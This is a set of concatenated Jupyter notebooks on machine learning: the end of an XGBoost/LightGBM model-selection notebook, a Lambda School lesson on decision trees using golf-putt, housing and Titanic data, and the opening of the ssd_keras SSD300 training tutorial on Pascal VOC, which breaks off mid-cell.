print("RandomizedSearchCV took %.2f seconds for %d candidates"
" parameter settings." % ((time.time() - start), n_iter_search))
best_xgbr = XGBRegressor(base_score=0.5, booster='gbtree', colsample_bylevel=1,
colsample_bynode=1, colsample_bytree=1.0, gamma=0.5, gpu_id=-1,
importance_type='gain', interaction_constraints='',
learning_rate=0.1, max_delta_step=0, max_depth=3,
min_child_weight=4, monotone_constraints='()',
n_estimators=95, n_jobs=8, num_parallel_tree=1, random_state=0,
reg_alpha=0, reg_lambda=1, scale_pos_weight=1, subsample=1,
tree_method='exact', validate_parameters=1, verbosity=None)
best_xgbr.fit(X_train, y_train)
import numpy as np  # needed for np.sqrt below
from sklearn.metrics import mean_squared_error, mean_absolute_error, median_absolute_error
def print_metrics(y_true, y_predicted):
print('Root Mean Square Error = ' +
str(np.sqrt(mean_squared_error(y_true, y_predicted))))
print('Mean Absolute Error = ' +
str(mean_absolute_error(y_true, y_predicted)))
print('Median Absolute Error = ' +
str(median_absolute_error(y_true, y_predicted)))
y_pred = best_xgbr.predict(X_test)
print_metrics(y_test**2, y_pred**2)
pickle.dump(best_xgbr, open('models/best_xgbr.sav', 'wb'))
import lightgbm as lgb
# n_estimators must be tuned later,
# because parameter draws sampled with higher n_estimators
# would get an unfair advantage (default=100)
params = {
'n_estimators': [100, 150, 250, 500],
'num_leaves': [8, 32, 64, 128, 256],
'max_depth': [3, 5, 8],
'boosting_type': ['gbdt', 'dart', 'goss'],
'learning_rate': [0.01, 0.05, 0.1, 0.2]}
lgbr = lgb.LGBMRegressor(seed=42)
n_iter_search = 100
random_search = RandomizedSearchCV(lgbr, param_distributions=params, verbose=2,
n_iter=n_iter_search, cv=cv_ts, scoring='neg_mean_squared_error', random_state=42)
start = time.time()
random_search.fit(X_train, y_train)
print("RandomizedSearchCV took %.2f seconds for %d candidates"
" parameter settings." % ((time.time() - start), n_iter_search))
best_lgbr = lgb.LGBMRegressor(max_depth=5, n_estimators=150, num_leaves=8)
best_lgbr.fit(X_train, y_train)
y_pred = best_lgbr.predict(X_test)
print_metrics(y_test**2, y_pred**2)
pickle.dump(best_lgbr, open('models/best_lgbr.sav', 'wb'))
```
XGBoost and LightGBM both deliver very solid results.
## Conclusion
My model-selection package has delivered its verdict. Once again, it is not omniscient and still leaves plenty of room for improvement. It is simply impossible to build a package that exhaustively sweeps every hyperparameter space for every dataset. It is, however, a very instructive tool for deciding which type of model to use on a given dataset. Here, tree-based models are clearly the big winners, which is not so surprising: as we saw during the EDA, the relationships between the predictors and the target variable are mostly not linear but far more complex.
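To illustrate that last point, here is a minimal sketch on synthetic data (not the project's dataset): a linear model and a shallow tree fit to a non-linear, non-monotonic target.

```python
import numpy as np
from sklearn.linear_model import LinearRegression
from sklearn.tree import DecisionTreeRegressor

rng = np.random.RandomState(0)
X = rng.uniform(-3, 3, size=(200, 1))
y = np.sin(X).ravel()  # non-linear, non-monotonic target

# The linear fit can only capture the overall trend; the tree approximates
# the curve piecewise and scores far higher on this kind of relationship.
linear_r2 = LinearRegression().fit(X, y).score(X, y)
tree_r2 = DecisionTreeRegressor(max_depth=5).fit(X, y).score(X, y)
print('Linear R^2:', round(linear_r2, 3))
print('Tree R^2:', round(tree_r2, 3))
```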
To take things further, it would be interesting to keep the main selected models and tune them with a technique other than grid search: Bayesian optimization. It would also be worth trying model-aggregation (ensembling) methods to see whether performance can be pushed further.
The models I want to keep exploring:
- ElasticNet and LassoLars
- Multilayer perceptron
- Random Forest
- XGBoost and LightGBM
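As a starting point for the ensembling idea, a hedged sketch (synthetic data, illustrative hyperparameters) stacking three of the shortlisted model families with scikit-learn's `StackingRegressor`:

```python
from sklearn.datasets import make_regression
from sklearn.ensemble import RandomForestRegressor, StackingRegressor
from sklearn.linear_model import ElasticNet, LassoLars
from sklearn.model_selection import train_test_split

X, y = make_regression(n_samples=400, n_features=10, noise=5.0, random_state=42)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)

# Base learners from the shortlisted families; a linear meta-learner on top.
stack = StackingRegressor(
    estimators=[('enet', ElasticNet(alpha=0.1)),
                ('lars', LassoLars(alpha=0.01)),
                ('rf', RandomForestRegressor(n_estimators=100, random_state=42))],
    final_estimator=ElasticNet(alpha=0.1))
stack.fit(X_train, y_train)
print('Stacked R^2:', stack.score(X_test, y_test))
```

On the real data, the base learners would of course be the tuned models saved above rather than these illustrative configurations.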
|
github_jupyter
|
_Lambda School Data Science — Tree Ensembles_
# Decision Trees
### Links
- A Visual Introduction to Machine Learning, [Part 1: A Decision Tree](http://www.r2d3.us/visual-intro-to-machine-learning-part-1/), and [Part 2: Bias and Variance](http://www.r2d3.us/visual-intro-to-machine-learning-part-2/)
- [Decision Trees: Advantages & Disadvantages](https://christophm.github.io/interpretable-ml-book/tree.html#advantages-2)
- [How decision trees work](https://brohrer.github.io/how_decision_trees_work.html)
- [How a Russian mathematician constructed a decision tree - by hand - to solve a medical problem](http://fastml.com/how-a-russian-mathematician-constructed-a-decision-tree-by-hand-to-solve-a-medical-problem/)
- [Let’s Write a Decision Tree Classifier from Scratch](https://www.youtube.com/watch?v=LDRbO9a6XPU) — _Don’t worry about understanding the code, just get introduced to the concepts. This 10 minute video has excellent diagrams and explanations._
### Libraries to install
#### graphviz (to visualize trees)
Anaconda:
```conda install python-graphviz```
Google Colab:
```!pip install graphviz
!apt-get install graphviz
```
#### ipywidgets (optional, for interactive widgets)
Anaconda: Already installed
Google Colab: [Doesn't work](https://github.com/googlecolab/colabtools/issues/60#issuecomment-462529981)
#### mlxtend (to plot decision regions)
[mlxtend.plotting.plot_decision_regions](http://rasbt.github.io/mlxtend/user_guide/plotting/plot_decision_regions/): `pip install mlxtend`
### Imports and helper functions
```
%matplotlib inline
import graphviz
from IPython.display import display
from ipywidgets import interact
import matplotlib.pyplot as plt
from mpl_toolkits import mplot3d
import numpy as np
import pandas as pd
import seaborn as sns
from sklearn.impute import SimpleImputer
from sklearn.linear_model import LinearRegression
from sklearn.metrics import r2_score
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor, export_graphviz
def viztree(decision_tree, feature_names):
"""Visualize a decision tree"""
dot_data = export_graphviz(decision_tree, out_file=None, feature_names=feature_names,
filled=True, rounded=True)
return graphviz.Source(dot_data)
def viz3D(fitted_model, df, feature1, feature2, target='', num=100):
"""
Visualize model predictions in 3D, for regression or binary classification
Parameters
----------
fitted_model : scikit-learn model, already fitted
df : pandas dataframe, which was used to fit model
feature1 : string, name of feature 1
feature2 : string, name of feature 2
target : string, name of target
num : int, number of grid points for each feature
References
----------
https://jakevdp.github.io/PythonDataScienceHandbook/04.12-three-dimensional-plotting.html
https://scikit-learn.org/stable/auto_examples/tree/plot_iris.html
"""
x1 = np.linspace(df[feature1].min(), df[feature1].max(), num)
x2 = np.linspace(df[feature2].min(), df[feature2].max(), num)
X1, X2 = np.meshgrid(x1, x2)
X = np.c_[X1.flatten(), X2.flatten()]
if hasattr(fitted_model, 'predict_proba'):
predicted = fitted_model.predict_proba(X)[:,1]
else:
predicted = fitted_model.predict(X)
Z = predicted.reshape(num, num)
fig = plt.figure()
ax = plt.axes(projection='3d')
ax.plot_surface(X1, X2, Z, cmap='viridis')
ax.set_xlabel(feature1)
ax.set_ylabel(feature2)
ax.set_zlabel(target)
return fig
```
# Golf Putts (1 feature, non-linear)
https://statmodeling.stat.columbia.edu/2008/12/04/the_golf_puttin/
```
%matplotlib inline
import matplotlib.pyplot as plt
columns = ['distance', 'tries', 'successes']
data = [[2, 1443, 1346],
[3, 694, 577],
[4, 455, 337],
[5, 353, 208],
[6, 272, 149],
[7, 256, 136],
[8, 240, 111],
[9, 217, 69],
[10, 200, 67],
[11, 237, 75],
[12, 202, 52],
[13, 192, 46],
[14, 174, 54],
[15, 167, 28],
[16, 201, 27],
[17, 195, 31],
[18, 191, 33],
[19, 147, 20],
[20, 152, 24]]
putts = pd.DataFrame(columns=columns, data=data)
putts['rate of success'] = putts['successes'] / putts['tries']
putts.plot('distance', 'rate of success', kind='scatter', title='Golf Putts');
```
### OLS Regression
```
%matplotlib inline
import matplotlib.pyplot as plt
putts_X = putts[['distance']]
putts_y = putts['rate of success']
lr = LinearRegression()
lr.fit(putts_X, putts_y)
print('R^2 Score', lr.score(putts_X, putts_y))
ax = putts.plot('distance', 'rate of success', kind='scatter', title='Golf Putts')
ax.plot(putts_X, lr.predict(putts_X));
```
### Decision Tree
```
%matplotlib inline
import matplotlib.pyplot as plt
def viztree(decision_tree, feature_names):
dot_data = export_graphviz(decision_tree, out_file=None, feature_names=feature_names,
filled=True, rounded=True)
return graphviz.Source(dot_data)
def putts_tree(max_depth=1):
tree = DecisionTreeRegressor(max_depth=max_depth)
tree.fit(putts_X, putts_y)
print('R^2 Score', tree.score(putts_X, putts_y))
ax = putts.plot('distance', 'rate of success', kind='scatter', title='Golf Putts')
ax.step(putts_X, tree.predict(putts_X), where='mid')
plt.show()
display(viztree(tree, feature_names=['distance']))
interact(putts_tree, max_depth=(1,6,1));
%matplotlib inline
import matplotlib.pyplot as plt
predictions = []
for distance in putts['distance']:
samples = putts.copy()
if distance <= 8.5:
samples = samples.query('distance <= 8.5')
if distance <= 4.5:
samples = samples.query('distance <= 4.5')
else:
samples = samples.query('distance > 4.5')
else:
samples = samples.query('distance > 8.5')
if distance <= 14.5:
samples = samples.query('distance <= 14.5')
else:
samples = samples.query('distance > 14.5')
prediction = samples['rate of success'].mean()
predictions.append(prediction)
print('R^2 Score', r2_score(putts_y, predictions))
ax = putts.plot('distance', 'rate of success', kind='scatter', title='Golf Putts')
ax.step(putts_X, predictions, where='mid');
```
# Wave (1 feature, non-monotonic, train/test split)
```
%matplotlib inline
import matplotlib.pyplot as plt
# Based on http://scikit-learn.org/stable/auto_examples/tree/plot_tree_regression.html
def make_data():
import numpy as np
rng = np.random.RandomState(1)
X = np.sort(5 * rng.rand(80, 1), axis=0)
y = np.sin(X).ravel()
y[::5] += 2 * (0.5 - rng.rand(16))
return X, y
wave_X, wave_y = make_data()
wave_X_train, wave_X_test, wave_y_train, wave_y_test = train_test_split(
wave_X, wave_y, test_size=0.25, random_state=42)
def regress_wave(max_depth=1):
tree = DecisionTreeRegressor(max_depth=max_depth)
tree.fit(wave_X_train, wave_y_train)
print('Train R^2 score:', tree.score(wave_X_train, wave_y_train))
print('Test R^2 score:', tree.score(wave_X_test, wave_y_test))
plt.scatter(wave_X_train, wave_y_train)
plt.scatter(wave_X_test, wave_y_test)
plt.step(wave_X, tree.predict(wave_X), where='mid')
plt.show()
interact(regress_wave, max_depth=(1,8,1));
```
# Simple housing (2 features)
https://christophm.github.io/interpretable-ml-book/interaction.html#feature-interaction
```
columns = ['Price', 'Good Location', 'Big Size']
data = [[300000, 1, 1],
[200000, 1, 0],
[250000, 0, 1],
[150000, 0, 0]]
house = pd.DataFrame(columns=columns, data=data)
house
```
### OLS Regression
```
house_X = house.drop(columns='Price')
house_y = house['Price']
lr = LinearRegression()
lr.fit(house_X, house_y)
print('R^2', lr.score(house_X, house_y))
print('Intercept \t', lr.intercept_)
coefficients = pd.Series(lr.coef_, house_X.columns)
print(coefficients.to_string())
%matplotlib notebook
import matplotlib.pyplot as plt
viz3D(lr, house, feature1='Good Location', feature2='Big Size', target='Price');
```
### Decision Tree
```
tree = DecisionTreeRegressor()
tree.fit(house_X, house_y)
print('R^2', tree.score(house_X, house_y))
%matplotlib notebook
import matplotlib.pyplot as plt
viz3D(tree, house, feature1='Good Location', feature2='Big Size', target='Price');
plt.figure()
table = house.pivot_table('Price', 'Good Location', 'Big Size')
sns.heatmap(table, annot=True, fmt='d', cmap='viridis');
```
# Simple housing, with a twist (feature interactions, 2 features)
```
house.loc[0, 'Price'] = 400000
house_X = house.drop(columns='Price')
house_y = house['Price']
house
```
### OLS Regression, without engineering an interaction term
```
lr = LinearRegression()
lr.fit(house_X, house_y)
print('R^2', lr.score(house_X, house_y))
print('Intercept \t', lr.intercept_)
coefficients = pd.Series(lr.coef_, house_X.columns)
print(coefficients.to_string())
```
### Decision Tree, without engineering an interaction term
```
tree = DecisionTreeRegressor()
tree.fit(house_X, house_y)
print('R^2', tree.score(house_X, house_y))
viztree(tree, feature_names=house_X.columns)
```
### OLS Regression, with engineered interaction term
```
house['Good Location * Big Size'] = house['Good Location'] * house['Big Size']
house_X = house.drop(columns='Price')
house_y = house['Price']
house
lr = LinearRegression()
lr.fit(house_X, house_y)
print('R^2', lr.score(house_X, house_y))
print('Intercept \t', lr.intercept_)
coefficients = pd.Series(lr.coef_, house_X.columns)
print(coefficients.to_string())
```
### Decision Tree, with engineered interaction term
```
tree = DecisionTreeRegressor()
tree.fit(house_X, house_y)
print('R^2', tree.score(house_X, house_y))
viztree(tree, feature_names=house_X.columns)
```
# Titanic (classification, interactions, non-linear / non-monotonic)
```
titanic = sns.load_dataset('titanic')
titanic['sex'] = (titanic['sex'] == 'female').astype(int)
imputer = SimpleImputer()
titanic_X = imputer.fit_transform(titanic[['age', 'sex']])
titanic_y = titanic['survived']
tree = DecisionTreeClassifier(max_depth=4)
tree.fit(titanic_X, titanic_y)
print('Accuracy', tree.score(titanic_X, titanic_y))
%matplotlib notebook
import matplotlib.pyplot as plt
viz3D(tree, titanic, feature1='age', feature2='sex', target='survived');
from sklearn.linear_model import LogisticRegression
logistic = LogisticRegression(solver='lbfgs')
logistic.fit(titanic_X, titanic_y)
print('Accuracy', logistic.score(titanic_X, titanic_y))
%matplotlib notebook
import matplotlib.pyplot as plt
viz3D(logistic, titanic, feature1='age', feature2='sex', target='survived');
```
|
github_jupyter
|
# SSD300 Training Tutorial
This tutorial explains how to train an SSD300 on the Pascal VOC datasets. The preset parameters reproduce the training of the original SSD300 "07+12" model. Training SSD512 works similarly, so there's no extra tutorial for that. The same goes for training on other datasets.
You can find a summary of a full training here to get an impression of what it should look like:
[SSD300 "07+12" training summary](https://github.com/pierluigiferrari/ssd_keras/blob/master/training_summaries/ssd300_pascal_07%2B12_training_summary.md)
```
from keras.optimizers import Adam, SGD
from keras.callbacks import ModelCheckpoint, LearningRateScheduler, TerminateOnNaN, CSVLogger
from keras import backend as K
from keras.models import load_model
from math import ceil
import numpy as np
from matplotlib import pyplot as plt
from models.keras_ssd300 import ssd_300
from keras_loss_function.keras_ssd_loss import SSDLoss
from keras_layers.keras_layer_AnchorBoxes import AnchorBoxes
from keras_layers.keras_layer_DecodeDetections import DecodeDetections
from keras_layers.keras_layer_DecodeDetectionsFast import DecodeDetectionsFast
from keras_layers.keras_layer_L2Normalization import L2Normalization
from ssd_encoder_decoder.ssd_input_encoder import SSDInputEncoder
from ssd_encoder_decoder.ssd_output_decoder import decode_detections, decode_detections_fast
from data_generator.object_detection_2d_data_generator import DataGenerator
from data_generator.object_detection_2d_geometric_ops import Resize
from data_generator.object_detection_2d_photometric_ops import ConvertTo3Channels
from data_generator.data_augmentation_chain_original_ssd import SSDDataAugmentation
from data_generator.object_detection_2d_misc_utils import apply_inverse_transforms
%matplotlib inline
```
## 0. Preliminary note
All places in the code where you need to make any changes are marked `TODO` and explained accordingly. All code cells that don't contain `TODO` markers just need to be executed.
## 1. Set the model configuration parameters
This section sets the configuration parameters for the model definition. The parameters set here are being used both by the `ssd_300()` function that builds the SSD300 model as well as further down by the constructor for the `SSDInputEncoder` object that is needed to run the training. Most of these parameters are needed to define the anchor boxes.
The parameters as set below produce the original SSD300 architecture that was trained on the Pascal VOC datasets, i.e. they are all chosen to correspond exactly to their respective counterparts in the `.prototxt` file that defines the original Caffe implementation. Note that the anchor box scaling factors of the original SSD implementation vary depending on the datasets on which the models were trained. The scaling factors used for the MS COCO datasets are smaller than the scaling factors used for the Pascal VOC datasets. The reason why the list of scaling factors has 7 elements while there are only 6 predictor layers is that the last scaling factor is used for the second aspect-ratio-1 box of the last predictor layer. Refer to the documentation for details.
As mentioned above, the parameters set below are not only needed to build the model, but are also passed to the `SSDInputEncoder` constructor further down, which is responsible for matching and encoding ground truth boxes and anchor boxes during the training. In order to do that, it needs to know the anchor box parameters.
```
img_height = 300 # Height of the model input images
img_width = 300 # Width of the model input images
img_channels = 3 # Number of color channels of the model input images
mean_color = [123, 117, 104] # The per-channel mean of the images in the dataset. Do not change this value if you're using any of the pre-trained weights.
swap_channels = [2, 1, 0] # The color channel order in the original SSD is BGR, so we'll have the model reverse the color channel order of the input images.
n_classes = 20 # Number of positive classes, e.g. 20 for Pascal VOC, 80 for MS COCO
scales_pascal = [0.1, 0.2, 0.37, 0.54, 0.71, 0.88, 1.05] # The anchor box scaling factors used in the original SSD300 for the Pascal VOC datasets
scales_coco = [0.07, 0.15, 0.33, 0.51, 0.69, 0.87, 1.05] # The anchor box scaling factors used in the original SSD300 for the MS COCO datasets
scales = scales_pascal
aspect_ratios = [[1.0, 2.0, 0.5],
[1.0, 2.0, 0.5, 3.0, 1.0/3.0],
[1.0, 2.0, 0.5, 3.0, 1.0/3.0],
[1.0, 2.0, 0.5, 3.0, 1.0/3.0],
[1.0, 2.0, 0.5],
[1.0, 2.0, 0.5]] # The anchor box aspect ratios used in the original SSD300; the order matters
two_boxes_for_ar1 = True
steps = [8, 16, 32, 64, 100, 300] # The space between two adjacent anchor box center points for each predictor layer.
offsets = [0.5, 0.5, 0.5, 0.5, 0.5, 0.5] # The offsets of the first anchor box center points from the top and left borders of the image as a fraction of the step size for each predictor layer.
clip_boxes = False # Whether or not to clip the anchor boxes to lie entirely within the image boundaries
variances = [0.1, 0.1, 0.2, 0.2] # The variances by which the encoded target coordinates are divided as in the original implementation
normalize_coords = True
```
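As a quick sanity check (a sketch, not part of the original notebook), the scale factors above translate into pixel box sizes on the 300x300 input, and the extra 7th scale only feeds the geometric mean used for the second aspect-ratio-1 box of each layer:

```python
import math

img_size = 300
scales = [0.1, 0.2, 0.37, 0.54, 0.71, 0.88, 1.05]  # scales_pascal from above

# Square anchor side length for each of the 6 predictor layers, in pixels.
box_sizes = [round(s * img_size) for s in scales[:-1]]
print(box_sizes)  # [30, 60, 111, 162, 213, 264]

# Second aspect-ratio-1 box per layer: sqrt(s_k * s_{k+1}), per the SSD paper.
second_ar1 = [round(math.sqrt(a * b) * img_size) for a, b in zip(scales, scales[1:])]
print(second_ar1)
```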
## 2. Build or load the model
Execute the code cells in only one of the two subsequent sub-sections, not both.
### 2.1 Create a new model and load trained VGG-16 weights into it (or trained SSD weights)
If you want to create a new SSD300 model, this is the relevant section for you. If you want to load a previously saved SSD300 model, skip ahead to section 2.2.
The code cell below does the following things:
1. It calls the function `ssd_300()` to build the model.
2. It then loads the weights file that is found at `weights_path` into the model. You could load the trained VGG-16 weights or you could load the weights of a trained model. If you want to reproduce the original SSD training, load the pre-trained VGG-16 weights. In any case, you need to set the path to the weights file you want to load on your local machine. Download links to all the trained weights are provided in the [README](https://github.com/pierluigiferrari/ssd_keras/blob/master/README.md) of this repository.
3. Finally, it compiles the model for the training. In order to do so, we're defining an optimizer (Adam) and a loss function (SSDLoss) to be passed to the `compile()` method.
Normally, the optimizer of choice would be Adam (commented out below), but since the original implementation uses plain SGD with momentum, we'll do the same in order to reproduce the original training. Adam is generally the superior optimizer, so if your goal is not to have everything exactly as in the original training, feel free to switch to Adam. You might need to adjust the learning rate scheduler below slightly in case you use Adam.
Note that the learning rate that is being set here doesn't matter, because further below we'll pass a learning rate scheduler to the training function, which will overwrite any learning rate set here, i.e. what matters are the learning rates that are defined by the learning rate scheduler.
`SSDLoss` is a custom Keras loss function that implements the multi-task loss that consists of a log loss for classification and a smooth L1 loss for localization. `neg_pos_ratio` and `alpha` are set as in the paper.
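For reference, a minimal NumPy sketch of the smooth L1 term used for localization (not the actual Keras implementation in `keras_ssd_loss.py`):

```python
import numpy as np

def smooth_l1(x):
    """Smooth L1: quadratic near zero, linear for |x| >= 1, applied elementwise."""
    absx = np.abs(x)
    return np.where(absx < 1.0, 0.5 * x ** 2, absx - 0.5)

print(smooth_l1(np.array([-2.0, 0.5, 0.0])))  # [1.5, 0.125, 0.0]
```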
```
# 1: Build the Keras model.
K.clear_session() # Clear previous models from memory.
model = ssd_300(image_size=(img_height, img_width, img_channels),
n_classes=n_classes,
mode='training',
l2_regularization=0.0005,
scales=scales,
aspect_ratios_per_layer=aspect_ratios,
two_boxes_for_ar1=two_boxes_for_ar1,
steps=steps,
offsets=offsets,
clip_boxes=clip_boxes,
variances=variances,
normalize_coords=normalize_coords,
subtract_mean=mean_color,
swap_channels=swap_channels)
# 2: Load some weights into the model.
weights_path = '/usr/local/data/msmith/uncertainty/ssd_keras/weights/VGG_ILSVRC_16_layers_fc_reduced.h5'
model.load_weights(weights_path, by_name=True)
# 3: Instantiate an optimizer and the SSD loss function and compile the model.
# If you want to follow the original Caffe implementation, use the preset SGD
# optimizer, otherwise I'd recommend the commented-out Adam optimizer.
#adam = Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)
sgd = SGD(lr=0.001, momentum=0.9, decay=0.0, nesterov=False)
ssd_loss = SSDLoss(neg_pos_ratio=3, alpha=1.0)
model.compile(optimizer=sgd, loss=ssd_loss.compute_loss)
```
### 2.2 Load a previously created model
If you have previously created and saved a model and would now like to load it, execute the next code cell. The only thing you need to do here is to set the path to the saved model HDF5 file that you would like to load.
The SSD model contains custom objects: Neither the loss function nor the anchor box or L2-normalization layer types are contained in the Keras core library, so we need to provide them to the model loader.
This next code cell assumes that you want to load a model that was created in 'training' mode. If you want to load a model that was created in 'inference' or 'inference_fast' mode, you'll have to add the `DecodeDetections` or `DecodeDetectionsFast` layer type to the `custom_objects` dictionary below.
```
# TODO: Set the path to the `.h5` file of the model to be loaded.
model_path = 'path/to/trained/model.h5'
# We need to create an SSDLoss object in order to pass that to the model loader.
ssd_loss = SSDLoss(neg_pos_ratio=3, alpha=1.0)
K.clear_session() # Clear previous models from memory.
model = load_model(model_path, custom_objects={'AnchorBoxes': AnchorBoxes,
'L2Normalization': L2Normalization,
'compute_loss': ssd_loss.compute_loss})
```
## 3. Set up the data generators for the training
The code cells below set up the data generators for the training and validation datasets to train the model. The settings below reproduce the original SSD training on Pascal VOC 2007 `trainval` plus 2012 `trainval` and validation on Pascal VOC 2007 `test`.
The only thing you need to change here are the filepaths to the datasets on your local machine. Note that parsing the labels from the XML annotations files can take a while.
Note that the generator provides two options to speed up the training. By default, it loads the individual images for a batch from disk. This has two disadvantages. First, for compressed image formats like JPG, this is a huge computational waste, because every image needs to be decompressed again and again every time it is being loaded. Second, the images on disk are likely not stored in a contiguous block of memory, which may also slow down the loading process. The first option that `DataGenerator` provides to deal with this is to load the entire dataset into memory, which reduces the access time for any image to a negligible amount, but of course this is only an option if you have enough free memory to hold the whole dataset. As a second option, `DataGenerator` provides the possibility to convert the dataset into a single HDF5 file. This HDF5 file stores the images as uncompressed arrays in a contiguous block of memory, which dramatically speeds up the loading time. It's not as good as having the images in memory, but it's a lot better than the default option of loading them from their compressed JPG state every time they are needed. Of course such an HDF5 dataset may require significantly more disk space than the compressed images (around 9 GB total for Pascal VOC 2007 `trainval` plus 2012 `trainval` and another 2.6 GB for 2007 `test`). You can later load these HDF5 datasets directly in the constructor.
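The idea behind the HDF5 option can be sketched with `h5py` (an illustrative toy example, not `DataGenerator`'s actual code): decoded images are stored as one contiguous uncompressed `uint8` array, so a batch is a simple slice read with no JPG decoding.

```python
import os
import tempfile

import h5py
import numpy as np

# Pretend these are 8 decoded 300x300 RGB images.
images = np.random.randint(0, 256, size=(8, 300, 300, 3), dtype=np.uint8)

path = os.path.join(tempfile.mkdtemp(), 'demo_dataset.h5')
with h5py.File(path, 'w') as f:
    f.create_dataset('images', data=images)  # uncompressed by default

with h5py.File(path, 'r') as f:
    batch = f['images'][0:4]  # reads one contiguous slab straight from disk
print(batch.shape)  # (4, 300, 300, 3)
```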
The original SSD implementation uses a batch size of 32 for the training. In case you run into GPU memory issues, reduce the batch size accordingly. You need at least 7 GB of free GPU memory to train an SSD300 with 20 object classes with a batch size of 32.
The `DataGenerator` itself is fairly generic. It doesn't contain any data augmentation or bounding box encoding logic. Instead, you pass a list of image transformations and an encoder for the bounding boxes in the `transformations` and `label_encoder` arguments of the data generator's `generate()` method, and the data generator will then apply those given transformations and the encoding to the data. Everything here is preset already, but if you'd like to learn more about the data generator and its data augmentation capabilities, take a look at the detailed tutorial in [this](https://github.com/pierluigiferrari/data_generator_object_detection_2d) repository.
The data augmentation settings defined further down reproduce the data augmentation pipeline of the original SSD training. The training generator receives an object `ssd_data_augmentation`, which is a transformation object that is itself composed of a whole chain of transformations that replicate the data augmentation procedure used to train the original Caffe implementation. The validation generator receives an object `resize`, which simply resizes the input images.
An `SSDInputEncoder` object, `ssd_input_encoder`, is passed to both the training and validation generators. As explained above, it matches the ground truth labels to the model's anchor boxes and encodes the box coordinates into the format that the model needs.
In order to train the model on a dataset other than Pascal VOC, either choose `DataGenerator`'s appropriate parser method that corresponds to your data format, or, if `DataGenerator` does not provide a suitable parser for your data format, you can write an additional parser and add it. Out of the box, `DataGenerator` can handle datasets that use the Pascal VOC format (use `parse_xml()`), the MS COCO format (use `parse_json()`) and a wide range of CSV formats (use `parse_csv()`).
```
# 1: Instantiate two `DataGenerator` objects: One for training, one for validation.
# Optional: If you have enough memory, consider loading the images into memory for the reasons explained above.
train_dataset = DataGenerator(load_images_into_memory=True, hdf5_dataset_path=None)
val_dataset = DataGenerator(load_images_into_memory=True, hdf5_dataset_path=None)
# 2: Parse the image and label lists for the training and validation datasets. This can take a while.
# TODO: Set the paths to the datasets here.
# The directories that contain the images.
VOC_2007_images_dir = '/usr/local/data/msmith/APL/Datasets/PASCAL/VOCdevkit/VOC2007/JPEGImages/'
VOC_2012_images_dir = '/usr/local/data/msmith/APL/Datasets/PASCAL/VOCdevkit/VOC2012/JPEGImages/'
# The directories that contain the annotations.
VOC_2007_annotations_dir = '/usr/local/data/msmith/APL/Datasets/PASCAL/VOCdevkit/VOC2007/Annotations/'
VOC_2012_annotations_dir = '/usr/local/data/msmith/APL/Datasets/PASCAL/VOCdevkit/VOC2012/Annotations/'
# The paths to the image sets.
VOC_2007_train_image_set_filename = '/usr/local/data/msmith/APL/Datasets/PASCAL/VOCdevkit/VOC2007/ImageSets/Main/train.txt'
VOC_2012_train_image_set_filename = '/usr/local/data/msmith/APL/Datasets/PASCAL/VOCdevkit/VOC2012/ImageSets/Main/train.txt'
VOC_2007_val_image_set_filename = '/usr/local/data/msmith/APL/Datasets/PASCAL/VOCdevkit/VOC2007/ImageSets/Main/val.txt'
VOC_2012_val_image_set_filename = '/usr/local/data/msmith/APL/Datasets/PASCAL/VOCdevkit/VOC2012/ImageSets/Main/val.txt'
VOC_2007_trainval_image_set_filename = '/usr/local/data/msmith/APL/Datasets/PASCAL/VOCdevkit/VOC2007/ImageSets/Main/trainval.txt'
VOC_2012_trainval_image_set_filename = '/usr/local/data/msmith/APL/Datasets/PASCAL/VOCdevkit/VOC2012/ImageSets/Main/trainval.txt'
VOC_2007_test_image_set_filename = '/usr/local/data/msmith/APL/Datasets/PASCAL/VOCdevkit/VOC2007/ImageSets/Main/test.txt'
# The XML parser needs to know what object class names to look for and in which order to map them to integers.
classes = ['background',
'aeroplane', 'bicycle', 'bird', 'boat',
'bottle', 'bus', 'car', 'cat',
'chair', 'cow', 'diningtable', 'dog',
'horse', 'motorbike', 'person', 'pottedplant',
'sheep', 'sofa', 'train', 'tvmonitor']
# train_dataset.parse_xml(images_dirs=[VOC_2007_images_dir,
# VOC_2012_images_dir],
# image_set_filenames=[VOC_2007_trainval_image_set_filename,
# VOC_2012_trainval_image_set_filename],
# annotations_dirs=[VOC_2007_annotations_dir,
# VOC_2012_annotations_dir],
# classes=classes,
# include_classes='all',
# exclude_truncated=False,
# exclude_difficult=False,
# ret=False)
train_dataset.parse_xml(images_dirs=[VOC_2007_images_dir, VOC_2012_images_dir],
image_set_filenames=[VOC_2007_train_image_set_filename, VOC_2012_train_image_set_filename],
annotations_dirs=[VOC_2007_annotations_dir, VOC_2012_annotations_dir],
classes=classes,
include_classes='all',
exclude_truncated=False,
exclude_difficult=False,
ret=False)
val_dataset.parse_xml(images_dirs=[VOC_2012_images_dir],
image_set_filenames=[VOC_2012_val_image_set_filename],
annotations_dirs=[VOC_2012_annotations_dir],
classes=classes,
include_classes='all',
exclude_truncated=False,
exclude_difficult=True,
ret=False)
# Optional: Convert the dataset into an HDF5 dataset. This will require more disk space, but will
# speed up the training. Doing this is not relevant in case you activated the `load_images_into_memory`
# option in the constructor, because in that case the images are in memory already anyway. If you don't
# want to create HDF5 datasets, comment out the subsequent two function calls.
# train_dataset.create_hdf5_dataset(file_path='dataset_pascal_voc_07+12_trainval.h5',
# resize=False,
# variable_image_size=True,
# verbose=True)
# val_dataset.create_hdf5_dataset(file_path='dataset_pascal_voc_07_test.h5',
# resize=False,
# variable_image_size=True,
# verbose=True)
# 3: Set the batch size.
batch_size = 32 # Change the batch size if you like, or if you run into GPU memory issues.
# 4: Set the image transformations for pre-processing and data augmentation options.
# For the training generator:
ssd_data_augmentation = SSDDataAugmentation(img_height=img_height,
img_width=img_width,
background=mean_color)
# For the validation generator:
convert_to_3_channels = ConvertTo3Channels()
resize = Resize(height=img_height, width=img_width)
# 5: Instantiate an encoder that can encode ground truth labels into the format needed by the SSD loss function.
# The encoder constructor needs the spatial dimensions of the model's predictor layers to create the anchor boxes.
predictor_sizes = [model.get_layer('conv4_3_norm_mbox_conf').output_shape[1:3],
model.get_layer('fc7_mbox_conf').output_shape[1:3],
model.get_layer('conv6_2_mbox_conf').output_shape[1:3],
model.get_layer('conv7_2_mbox_conf').output_shape[1:3],
model.get_layer('conv8_2_mbox_conf').output_shape[1:3],
model.get_layer('conv9_2_mbox_conf').output_shape[1:3]]
